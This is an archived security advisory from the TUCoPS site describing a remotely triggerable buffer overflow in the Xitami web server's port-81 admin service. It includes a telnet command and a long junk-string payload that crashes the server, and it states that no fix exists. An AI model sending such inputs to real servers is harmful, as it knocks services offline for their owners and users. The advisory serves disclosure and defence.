Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: xitami1.htm

Xitami Web Server - Remotely Exploitable Buffer Overflow



Vulnerability

    Xitami

Affected

    Xitami Web Servers

Description

    Meliksah Ozoral  found following.   He found  a bug  on Xitami web
    server.  He tested it on  v2.4c3 it worked very well.   Xitami DoS
    is a remotely exploitable buffer  overflow.  Xitami has open  port
    81 for admin config program.  You can crash server by sending huge
    packets on port 81.  For Example:

        telnet localhost 81

        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

    Xitami Crashed.

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH